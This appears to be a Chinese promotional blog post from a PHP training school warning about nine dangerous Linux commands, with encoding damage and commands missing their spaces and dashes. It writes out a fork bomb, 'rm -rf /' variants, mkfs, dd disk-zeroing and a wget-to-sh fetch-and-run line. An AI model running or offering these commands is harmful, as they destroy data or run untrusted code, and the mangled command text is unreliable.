PHP開發(fā)程序員應時刻警惕這九個命令和代碼

　　在現(xiàn)如今，隨著互聯(lián)網技術飛速的發(fā)展，丟失各種數(shù)據(jù)信息是難免避免的，比如Linuxshell/terminal命令非常強大，即使一個簡單的命令就可能導致文件夾、文件或者路徑文件夾等被刪除。在一些情況下，Linux甚至不會詢問你而直接執(zhí)行命令，導致你丟失各種數(shù)據(jù)信息。這里我收集了一些對系統(tǒng)有危害的Linux代碼，幫助你避免他們。請記住：這些代碼非常危險，甚至可以經過修改，變得更加有危害性。

　　還有一些事情需要注意：一些命令只在Ubuntu中有sudo前綴時是有危害的。其他發(fā)行版本的Linux，則是在作為根目錄命令時會有危害。

　　1.、LinuxForkBombCommand

　　:(){:|:&};:以ForkBomb聞名，是一個拒絕服務攻擊的Linux系統(tǒng)。:(){:|:&};:是一個bash函數(shù)。只要被執(zhí)行，他會不斷重復，直到系統(tǒng)被凍結。

　　你只能重啟系統(tǒng)解決這個問題。所以當你在Linux界面執(zhí)行這個命令時一定要注意。

　　2、MvFolder/Dev/NullCommand

　　mvfolder/dev/null也是一個危險的命令。Dev/null或者nulldevice是一個刪除所有寫在這個設備文件上數(shù)據(jù)的設備文件，但是，該操作提示卻是寫入操作執(zhí)行成功。這就是我們常說的bitbucked或者blackhole。

　　3、RmRfCommand

　　rmrf命令在Linux系統(tǒng)中可以快速刪除文件夾及其內容。如果，你不知道如何正確使用它，你就只有哭了。

　　列下mrf命令最常見的組合和選擇：

　　rmcommand：刪除Linux系統(tǒng)的文件

　　rmfcommand：不需提示，刪除文件中的只讀文件

　　rmrcommand循環(huán)刪除文件夾的內容

　　rmdcommand：刪除空目錄，如果非空目錄則不會執(zhí)行該操作

　　rmrf/command：強制刪除根目錄中的所有內容和子文件夾(包括寫保護文件)命令。

　　rmrfcommand：強制刪除當前目錄中的所有內容(當前工作目錄)和字文件夾

　　rmrf.command：強制刪除當前文件夾目錄/子目錄中的所有內容。同rmr.[^.]

　　Thermr.[^.]command：刪除文件及文件夾，帶有刪除提示

　　4、MkfsCommand

　　如果你不知mkfs的作用，那么它也是一個危險的命令，mkfs之后寫的任何命令都將會被一個空白的linux文件系統(tǒng)格式化、替代。

　　下面列舉出需要管理員權限，格式化硬盤的命令：

　　mkfs

　　mkfs.ext3

　　mkfs.bfs

　　mkfs.ext2

　　mkfs.minix

　　mkfs.msdosmkfs.reiserfs

　　mkfs.vfat

　　mkfs.cramfs也可以和上面的代碼做同樣的事情，不過不需要管理源權限。

　　5、TarBomb

　　tar命令用于將多個文件以.tar格式放入一個文件中(存檔文件)。TapeArchive(Tar)bomb可以由他創(chuàng)建。

　　當為壓縮時，就是這個存檔文件生成數(shù)以萬計的相似名稱文件出現(xiàn)在當前目錄中而不是新目錄。

　　當收到tar文件，定期創(chuàng)建一個新的保護目錄，然后在解壓前將接受的tar文件放到這個目錄中，你可以避免成為tarbomb的受害者。

　　6、DdCommand

　　Dd命令用于復制&改變硬盤分區(qū)。如果，你用錯地方了，那么也很危險。

　　下面列舉dd命令：

　　ddif=/dev/hdaof=/dev/hdb

　　ddif=/dev/hdaof=/dev/sdb

　　ddif=somethingof=/dev/hda

　　ddif=somethingof=/dev/sda

　　下面這個命令會將整個主硬盤清零：ddif=/dev/zeroof=/dev/had

　　7、ShellCode

　　有時候，你可能會被人坑，給你一個shell腳本文件，讓你去下載并執(zhí)行它。該腳本可能會包含一些惡意的或危險的代碼。命令形式可能會是這樣：wgethttp://some_malicious_sourceO|sh。wget將會在sh狹隘腳本時下載腳本。

　　8、MaliciousSourceCode

　　也許有人會給你源代碼讓你編譯他。代碼可能是正常代碼，不過，有一些惡意代碼偽裝在大型源代碼中，如果是這樣，你的系統(tǒng)就中槍了。如何避免?僅接受并編譯可信賴來源的源代碼。

　　9、DecompressionBomb

　　你已經收到一個壓縮文件，你被要求提取這個看起來很小的文件，可能小到KB。事實上，該小尺寸的壓縮文件包含高度壓縮數(shù)據(jù)。

　　只要文件解壓，上百GB數(shù)據(jù)會被提取，這時候，過大的數(shù)據(jù)填滿硬盤導致宕機，幾率就很大了。如何避免?還是那句老話，別手賤，什么文件都去接收，請接收可信任來源文件。

　　最后希望對同學們有所幫助。想要學習PHP培訓技術的小伙伴歡迎選擇扣丁學堂進行學習?？鄱W堂不僅有專業(yè)的老師和與時俱進的課程體系，還有大量的PHP視頻教程供學員觀看學習，想要學到實用技術高薪就業(yè)的小伙伴抓緊時間行動吧?？鄱W堂PHP技術交流群：374332265。